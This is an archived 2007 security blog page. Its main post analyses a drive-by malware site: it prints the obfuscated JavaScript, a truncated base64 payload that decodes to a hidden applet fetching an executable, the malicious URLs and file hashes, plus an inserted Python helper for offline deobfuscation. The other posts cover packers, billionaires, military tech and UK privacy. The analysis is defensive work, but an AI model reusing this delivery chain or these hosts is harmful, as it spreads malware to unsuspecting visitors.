Saturday, March 10, 2007

Shots from the Malicious Wild West - Sample Two

Packers are logically capable of rebooting the lifecycle of a binary and making it truly unrecognizable. The Pohernah Crypter is among the many recently released packers you might be interested in taking a peek at. By the time a packer's pattern becomes recognizable, a new one is introduced, and in special cases there are even packers taking advantage of flaws in AV software itself.

Compared to the common wisdom of malware authors being self-sufficient and coming up with packers by themselves, we've already seen cases where investment in purchasing commercial anti-debugging software is considered. You may find these test results of various anti-virus software against packed malware informative; as a matter of fact, they truly back up my experience with the winning engines and their performance in respect to packed malware.

File size: 6901 bytes
MD5: 6ce1283af00f650e125321c80bf42097
SHA1: 08ac9a9e2181d8a94e6d96311c21c8db1766e2f1

Shots from the Malicious Wild West - Sample One

Come to daddy. At _http://www.ms-counter.com we have a URL spreading malware through redirectors and the usual JavaScript obfuscation:

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Then we get the following:

var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk"+"lmnopqrstuvwx"+"yz0123456789+/=";
// plain base64 decoder; the shifts mangled into "<<>>" by the HTML extraction are restored to their standard form
function decode64(input) {
  var output = "";
  var chr1, chr2, chr3;
  var enc1, enc2, enc3, enc4;
  var i = 0;
  input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); // drop anything outside the base64 alphabet
  do {
    enc1 = keyStr.indexOf(input.charAt(i++));
    enc2 = keyStr.indexOf(input.charAt(i++));
    enc3 = keyStr.indexOf(input.charAt(i++));
    enc4 = keyStr.indexOf(input.charAt(i++));
    chr1 = (enc1 << 2) | (enc2 >> 4);
    chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
    chr3 = ((enc3 & 3) << 6) | enc4;
    output = output + String.fromCharCode(chr1);
    if (enc3 != 64) { output = output + String.fromCharCode(chr2); } // index 64 is the '=' padding
    if (enc4 != 64) { output = output + String.fromCharCode(chr3); }
  } while (i < input.length);
  return output;
}
document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam ETC. ETC. ETC.
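As an added example (not part of the original post), here is a small Python helper that performs the deobfuscation offline instead of letting document.write() run it, then pulls the applet archive, class name and parameter URL out of the decoded markup as indicators to block and hunt for. It assumes the sample's decode64() is a plain base64 decoder and uses the truncated base64 fragment quoted above as its constructed input.

```python
import base64
import re

# Constructed sample: the document.write(decode64("...")) call quoted on
# the page, with its base64 payload exactly as the page shows it (cut off
# mid-stream, so the final group of four characters is incomplete).
OBFUSCATED_JS = '''document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam'''

def decode_b64_fragment(payload):
    """Decode base64 the way the sample's decode64() does (strip every
    character outside the alphabet first), but tolerate a truncated tail
    by discarding an incomplete final 4-character group."""
    clean = re.sub(r"[^A-Za-z0-9+/=]", "", payload)
    clean = clean[: len(clean) - len(clean) % 4]
    return base64.b64decode(clean).decode("latin-1")

def extract_decode64_payloads(js):
    """Decode every decode64("...") argument without executing any script.
    The negated quote class runs to end-of-input if the literal is unterminated."""
    return [decode_b64_fragment(p) for p in re.findall(r'decode64\(\s*"([^"]*)', js)]

def extract_indicators(html):
    """Pull applet archive/class names and URL-valued <param>s out of the
    decoded markup: the artefacts a defender blocks and hunts for."""
    found = {"archives": [], "classes": [], "urls": []}
    for m in re.finditer(r"<applet\b([^>]*)>", html, re.I):
        attrs = m.group(1)
        for key, attr in (("archives", "archive"), ("classes", "code")):
            hit = re.search(r'\b%s\s*=\s*"?([^"\s>]+)' % attr, attrs, re.I)
            if hit:
                found[key].append(hit.group(1))
    found["urls"] = re.findall(r'value\s*=\s*"(https?://[^"]+)"', html, re.I)
    return found

def analyse(js):
    """Deobfuscate, then report the decoded markup and its indicators."""
    decoded = "".join(extract_decode64_payloads(js))
    report = {"decoded": decoded}
    report.update(extract_indicators(decoded))
    return report

if __name__ == "__main__":
    for key, value in analyse(OBFUSCATED_JS).items():
        print(key, "=>", value)
```

The decoded markup is a 1x1 applet tag, which is why nothing is visible on the page while the jar is fetched and load.php is contacted.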

Deobfuscating the JavaScript, we get to see where the binary is:

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response:
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info:
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it over VT we get the results you can see in the screenshot. It's obvious that major AV software doesn't detect this one, but what you should keep in mind is the currently flawed signature-based malware detection approach. That's of course assuming someone is considering updating their AV software at all. In another analysis I'll come up with another binary that all major AV vendors detect but the second-tier ones don't. Host-based IPS protection and behaviour blocking, together with actually preventing the script from loading, is the way to avoid the exploitation of the flaws in signature-based scanning protection.

Friday, March 09, 2007

Envy These Women Please

Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of the women billionaires they envy most:

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

Is it just me, or is inherited wealth boring right from the very beginning? The emergence of the spoon people, or so they say -- "Spoon feeding in the long run teaches us nothing but the shape of the spoon" (Edward Morgan Forster). A week ago I participated in a discussion about power, most importantly one trying to define power, and we ended up with several states of power: positional power (the C-level executives), expertise power (or the revenge of the underestimated walking case studies), and networking power. It's all a cyclical process, like pretty much anything in life.

U.K's Latest Military Satellite System

The U.K military is about to upgrade their Skynet 4 satellite system to Skynet 5:

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning: its capability to target bandwidth where it's needed, and the sort of DENY:ALL upgraded receive antenna to avoid jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest -- so vulnerable it makes you want to establish a space warfare code of conduct.

Armed Land Robots

After seeking to dominate the air, it's time defense contractors turn back to innovating on the ground, especially when we speak of armed and remotely controlled robots. Crucial for both reconnaissance and guerilla warfare situations, movement flexibility as well as payload capacity is what adds more value to these robots. The Israeli defense contractor Elbit Systems recently introduced The Viper:

"The Viper, which is about a foot long and weighs approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility of a 360 degree view, its noise generation level, the variety of terrains it supports, and most importantly - whether it would put itself back on its "feet" if it inevitably turns upside down. See, you wouldn't want your pricey attack toy acting like a cheap remotely controlled car toy, would you? Engadget has a photo of the Viper.

Here's a recommended article on the history of armed aerial UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case.

Thursday, March 08, 2007

UK Telecoms Lack of Web Site Privacy

When the U.S and Canada are the benchmark, it's logical to conclude the U.K gets poor ratings, as web site privacy, especially in the commercial sector, is something the U.S and Canada tackled a long time ago. Taking the pragmatic perspective, does it really matter in times when government officials abuse commercially aggregated data, data they cannot legally obtain by themselves, and so have to perform as paper tigers to access it? Here's an interesting analysis:

"The U.K. industry, however, performed much worse in privacy. Telecom firms, especially in the U.K., ask for more personal data than companies in other industries. This data is often unconnected to the request being made by the customer.

U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the U.S. in the past 12 months, but the U.K. has shown no significant change.

It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 sites routinely share personal data with other internal groups, business partners or third parties without explicit permission. This compared poorly with the U.S., where 40 per cent share in the same way. The best performing site with regards to privacy in the U.K. was O2."

Moreover, the U.K, realizing its ongoing negative PR across the globe in respect to the CCTV surveillance myopia, has released a report claiming Italy's COMINT is worse than their (walking) CCTV surveillance efforts. To publish a privacy policy or not to publish a privacy policy? That "used to be" the question.